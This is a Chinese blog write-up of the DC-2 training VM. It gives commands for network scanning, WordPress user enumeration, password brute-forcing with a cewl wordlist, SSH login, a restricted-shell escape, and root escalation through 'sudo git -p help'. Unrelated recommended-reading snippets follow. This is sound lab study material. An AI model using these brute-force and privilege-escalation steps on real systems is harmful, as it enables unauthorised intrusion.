WHCSRL 技术网

DC-2 靶机

DC-2靶机下载地址: DC-2 | Five86 | DC Challenges

环境:DC-2靶机地址:192.168.1.139

nmap -sP 192.168.1.0/24    查看ip
nmap -A 192.168.1.139      #这里我的靶机IP是132
dirb 192.168.1.139         爆破目录

这里查出了靶机IP为192.168.1.139 靶机开放了80端口和7744端口、

然后访问192.168.1.139发现是这个界面,什么也没有看到

(通常是解析造成的)在hosts文件添加对应的ip和域名 保存并退出

vim /etc/hosts

然后访问192.168.1.139

往下滑发现flag1

根据提示,搜索cewl,发现是一个kali自带的密码生成工具

wpscan --url http://dc-2 --enumerate u  #扫出dc-2的用户  admin  Jerry  tom
vim dc-2_user.txt    #将用户写入该文件
cat dc-2_user.txt    #查看该文件
cewl -w dc2-passwords.txt http://dc-2   将cewl生成的密码写进password

使用wpscan进行爆破

wpscan --ignore-main-redirect --url 192.168.1.139 -U dc-2_user.txt -P dc2-passwords.txt --force

爆出两个用户名和密码

然后用ssh对其中一个进行连接,输入密码

ssh tom@192.168.1.132 -p 7744

接着,,,

BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

找到flag3

切换到Jerry用户找到flag4

flag4 提示我们可以使用git,我们可以通过git来提权

sudo -l
sudo git -p help

然后弹出一堆东西最后是个冒号,我们在冒号后面输入

! /bin/bash

然后就到了root用户再输入id ,whoami查看自己的成果

 祝你有一个美好的一天!!!

文章知识点与官方知识档案匹配,可进一步学习相关知识
CS入门技能树Linux入门初识Linux949 人正在系统学习中
推荐阅读

python 如何解决此类问题:TypeError: object of type \'NoneType\' has no len()

我最近数据分析查询sql 的时候,没有查询到数据,但想先判断是否查询到的信息。这里先展示我的部分代码:sql= "。。。。。。。。"cursor.execute(sql)results=cursor.fetchall()print “ len(results)= %s” % len(results)if len(results)>0: 后续操作else:...

射频包络峰值功率 PEP_wu_ming1的博客

What is RF Peak Envelope Power (PEP)Definition of PowerPower is the rate of doing work or the rate of flow of energy.Power in a DC circuitIn a DC circuit, power is given by Joules first law and Ohms law as V*I.Power in an AC circuitIn an AC circuit

Olotb Vibram Five Fingers $54 vgpk

Ankle (9147) Knee High (7865) Mid-Calf (3517) Thigh High (1099) Narrow by Toe Type: Sandals (81554) Boots (64052) Pumps&nbsp,Vibram Five Fingers;(25477) Sneakers (17202)

signature=f5a379c34fda32b9de4ae684c448d6cf,P4-07-08: Subsets and Molecular Signatures of Circulating...

摘要:Background: Circulating tumor cells (CTCs) represent the "seeds" of intractable brain metastatic breast cancer (BMBC); however, properties of CTCs targeting the brain remain elusive. For example, t...

一百个英语句子,顺便背单词_bit

1. Typical of the grassland dwellers of the continent is the American antelope, or pronghorn. 1.美洲羚羊,或称叉角羚,是该大陆典型的草原动物。 2. Of the millions who saw Haley’s comet in 1986, how many people will